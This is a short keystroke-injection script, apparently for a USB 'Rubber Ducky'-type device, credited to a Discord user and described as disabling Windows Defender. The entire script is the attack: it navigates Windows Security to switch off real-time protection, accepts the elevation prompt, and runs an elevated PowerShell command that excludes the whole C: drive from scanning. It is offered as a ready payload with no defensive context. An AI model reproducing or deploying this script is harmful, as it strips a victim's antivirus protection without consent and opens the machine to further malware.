REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Disables Windows Defender.
REM Version: 1.0
REM Category: Execution
DELAY 1500
CTRL ESC
DELAY 750
STRING windows security
DELAY 250
ENTER
DELAY 1000
ENTER
DELAY 500
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 500
SPACE
DELAY 1000
ALT y
DELAY 1000
ALT F4
DELAY 500
GUI r
DELAY 500
STRING powershell
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 1000
STRING Add-MpPreference -ExclusionPath “C:”
ENTER
DELAY 2000
STRING EXIT
ENTER
